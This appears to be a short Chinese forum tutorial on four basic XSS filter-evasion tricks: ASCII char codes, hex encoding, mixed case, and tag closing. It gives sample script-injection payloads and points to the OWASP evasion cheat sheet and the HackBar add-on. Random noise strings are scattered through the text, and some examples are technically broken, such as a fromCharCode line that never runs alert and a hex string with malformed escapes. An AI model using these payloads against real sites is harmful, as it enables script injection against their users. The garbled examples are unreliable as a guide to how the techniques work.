四种超级基础的绕过方法。/ T2 B9 H+ \$ V4 r
1.转换为ASCII码
3 g2 m4 [% q5 o( E7 z例子:原脚本为<script>alert(‘I love F4ck’)</script >
* Z/ D- {" U) U9 e& ]通过转换,变成:
! k( Q8 C* \5 _) s7 w8 Z<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
; |% d( u& ] }4 x! _- l( A & ]+ I. Z! n" z% B# ? U/ [
2.转换为HEX(十六进制)* l8 l5 x5 u2 ^, y& ]. D" i
例子:原脚本为<script>alert(‘I love F4ck’)</script>% K+ m; E1 v" v ?+ q! B
通过转换,变成:
, x5 l- [- Q$ M+ U%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
: U$ u7 @4 h7 m 7 h' y9 f& }2 g0 d7 A
3.转换脚本的大小写4 `; f: Y: D* q4 |/ E; X0 d
例子:原脚本为<script>alert(‘I love F4ck’)</script>
- {3 E, U1 ~8 u6 m8 ~转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>$ S- @7 H( E) \; g% b G9 p3 R
2 [9 ?- w2 ?- H7 ~% S9 a4.增加闭合标记”>8 S0 e; S- w' [: _0 `
例子:原脚本为<script>alert(‘I love F4ck’)</script>" ]. [, x, F9 s
转换为:”><script>alert(‘I love F4ck’)</script>
' N/ o; X) s4 z% h2 [9 s更详细绕过技术请参考此网页0 f" q/ e$ S# v$ v4 v9 s
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet& i8 X+ [1 s0 U& r! h" J
7 `4 Z# v6 x+ F, U! ]转换工具使用的是火狐的 hackbar mozilla addon. |